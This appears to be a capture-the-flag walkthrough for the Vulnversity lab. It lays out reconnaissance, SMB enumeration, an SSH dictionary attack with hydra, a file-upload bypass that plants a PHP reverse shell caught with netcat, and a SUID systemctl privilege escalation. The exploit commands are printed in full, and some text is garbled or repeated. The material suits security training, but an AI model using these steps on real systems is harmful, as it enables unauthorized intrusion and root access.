[Linux] Vulnversity
Reconnaissance
sudo nmap 10.10.82.240
sudo nmap -A -p 10.10.82.240
Enumeration
SMB
SMB is likely to reveal more information because it is often misunderstood and poorly implemented.
enum4linux -a 10.10.82.240
We find a unix user called Bill.
SSH
We can use this information to conduct a dictionary attack on Bill's password on the Linux machine
hydra -l bill -P /usr/share/wordlists/rockyou.txt 10.10.82.240 sshIt fails!
HTTP
The websitre at port 3128 is not accessible.
The website at port 3333 is accessible. So we can perform a page enumeration process over that url.
gobuster dir -u http://10.10.82.240:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
The /internal page is an upload interface. We need to determine which file extensions are accepted, and Burp Intruder will assist us in identifying valid uploadable extensions.
Exploitation
The server accepts .phtml files, so we will create a reverse shell using this extension.
tree /usr/share/webshells/
cp /usr/share/webshells/php/php-reverse-shell.php php-reverse-shell.phtml
We upload this file and then access to it after opening the netcat listener.
nc -nlvp 1234
We can then get a stable shell. doing the following procedure.
Privilege Escalation
We can search for all files with the SUID bit set, and we find quite a few.
find / -perm -u=s -type f 2>/dev/nullSystemctl command is listed. As we know thi command require a sudo right to be executed, we can use GTFOBINS to find a script which will allow us to elevate our privilege.
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash /tmp/stef && chmod +s /tmp/stef"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
/tmp/stef -p
The systemctl command is listed. Since this command requires sudo privileges to execute, we can use GTFOBINS to find a script that will allow us to elevate our privileges
Remediation
Last updated